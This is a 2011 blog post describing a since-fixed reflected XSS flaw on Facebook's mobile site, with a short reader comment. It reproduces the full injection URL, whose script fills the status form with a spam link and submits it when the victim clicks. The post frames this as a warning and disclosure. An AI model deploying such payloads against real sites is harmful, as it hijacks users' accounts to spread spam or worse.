Tuesday, March 29, 2011

New XSS at m.facebook.com

So,noticed that there's a new XSS vulnerability found at facebook by someone.
Figured out after saw my friend update his facebook status in Indonesian language.

so,the what the attacker can do is when a victim click the link,the victim will automatically update his/her facebook status via..facebook own apps!!
u can see the status is updated via Share from the screenshot.


so,how the attacker do to make the victim will update their status just by clicking the link??

http://m.facebook.com/path/blalallaa.php?display=wap&user_xxxx_xxxx='%3Cscript%3Ewindow.onload=function(){document.forms[0].message.value='Update Status!!!%20http://fakelink.cc/something';document.forms[0].submit();}%3C/script%3E

- if u want to click the link without updating your facebook,logout first :D
- make the shorten url become the real url first
- still,never click.maybe some attacker can use a dangerous script for something bad attempt
- just remove the status update before your friend click it.pls dont share for fun.it can be something that dangerous for your facebook account if the attacker want to.

edited :
- facebook team already fixed this vuln.
- my friend also blogged about this. here
disclaimer : i'm not the one found this vuln at first.kudos to the real founder.


Anonymous said...

nice post! =)